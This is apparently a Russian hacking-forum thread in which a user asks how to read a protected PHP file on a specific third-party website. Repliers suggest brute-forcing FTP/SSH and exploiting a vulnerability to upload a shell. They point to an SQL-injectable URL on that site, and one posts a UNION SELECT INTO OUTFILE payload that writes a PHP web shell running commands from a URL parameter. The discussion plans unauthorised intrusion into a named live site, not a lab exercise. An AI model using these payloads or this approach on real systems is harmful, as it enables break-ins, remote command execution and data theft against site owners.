Привет всем!

Столкнулся с проблемой чтения содержимого .php файла!


_http://www.myvm3.com/modules/Editors/

Файл hw_user.php

Какие будут соображения?

обычно если права не стоят на чтение то сообщение не такое ,а 403 форбидден.
скорее это скрипт выдает
знаешь так делают:
index.php: <?php define('inside', True);
library.php: <?php if (! defined('inside')) die('Access denied');
что бы не вызывались файлы напрямую.

А вообще, как прочитать содержимое ентого файла?

Искать уязвимость и заливать шелл

сбрутить пароль ФТП/ССШ

а на прямую тебе сервер не отдаст содержимое PHP файла

http://www.myvm3.com/index.php?page=search&s_res=OR&q=&cid=2142&sub_cid=1'

сбрутить пароль ФТП/ССШ

- нонсенс! После 5 неправильных попыток, хостер блокирует ip.

http://www.myvm3.com/index.php?page=search&s_res=OR&q=&cid=2142&sub_cid=1'

Видимо, sql-inj! Попытаться через инклуд, что ли?

а на прямую тебе сервер не отдаст содержимое PHP файла

Типа уронить пхп-интерпретор!

Попытаться через инклуд, что ли?
для начала попытаться подобрать количество полей.

ec3_category

имеет такую структуру!

id mediumint(8) unsigned NOT NULL auto_increment,
name varchar(100) NOT NULL,
pid mediumint(8) unsigned NOT NULL,
fset varchar(255) NOT NULL,
weight smallint(5) unsigned NOT NULL,
image varchar(255) NOT NULL,
se_url varchar(255) NOT NULL,
descr text NOT NULL,
meta_k text NOT NULL,
meta_d text NOT NULL,
PRIMARY KEY (id),
KEY pid (pid),
KEY fset (fset),
KEY name ( name(5) )

L I G A,

ты это миел ввиду?

_site.gov/main.php?cu=-1+union+select+null,null,'<? system($_GET['c']); ?>',null,null+INTO+OUTFILE+'../../../../*****/absolut/put`/k_www/shell.php'/*

L I G A,

ты это миел ввиду?

_site.gov/main.php?cu=-1+union+select+null,null,'<? system($_GET['c']); ?>',null,null+INTO+OUTFILE+'../../../../*****/absolut/put`/k_www/shell.php'/*
я имел ввиду сначала подобрать количество полей,
в твоем запросе это количество "null'ов"
дальше будешь видеть что и как ,и мб сможешь залить простой шелл как ты продемонстрировал на своем примере.
и на будущее: для таких вопроов есть отдельная тема тыц (http://forum.antichat.ru/thread46016.html)

и на будущее: для таких вопроов есть отдельная тема тыц

Буду знать!

Кол-во полей в таблице известно - 14 я насчитал!

Какой шелл посоветуете, чтобы прочесть искомый файл или слить его локально?

Кол-во полей в таблице известно - 14 я насчитал!
что то я сомневаюсь,я б для начала посаветовал тебе не пожалеть время а сесть и прочитать замечательную статью
Dr.Z3r0 о SQL INJECTION в разделе "наши статьи",если оно тебе действительно надо,а не надеятся на кого то.

Читаю, пробую применить примеры от http://forum.antichat.ru/thread43966.html

Видимо фильтруется!

Очень сложно делать что-то впервый раз! Пытаюсь использовать изнания из статьи - не получается!